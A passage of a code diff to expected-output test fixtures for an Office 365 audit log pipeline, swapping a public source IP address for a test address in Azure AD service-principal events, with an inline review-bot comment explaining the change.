APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -10324,9 +10324,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:00",
 "ExtendedProperties": [
 {
@@ -10560,7 +10560,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -10590,9 +10590,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:00",
 "ExtendedProperties": [
 {
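Review bot: Only the raw `o365audit.ActorIpAddress` and `o365audit.ClientIP` copies change here; the ECS fields a pipeline would derive from them (`source.ip`, `client.ip`, `related.ip` and any `geo` enrichment) are outside this hunk, so the same substitution and a fresh geo lookup for 67.43.156.15 still need to be confirmed elsewhere in the expected file — if the file was regenerated with the package test tooling rather than edited by hand, that is already covered. The old value 83.57.233.151 is a publicly routed address that can be attributed to a real party, whereas 67.43.156.15 is presumably one of the addresses the test GeoIP database resolves, which is the appropriate kind of fixture value for committed expected output. The same change recurs in the hunks at -10856, -11122 and -11388 and in the paired `event.original` hunks at -10826, -11092 and -11358; this note covers all of them.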
@@ -10826,7 +10826,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
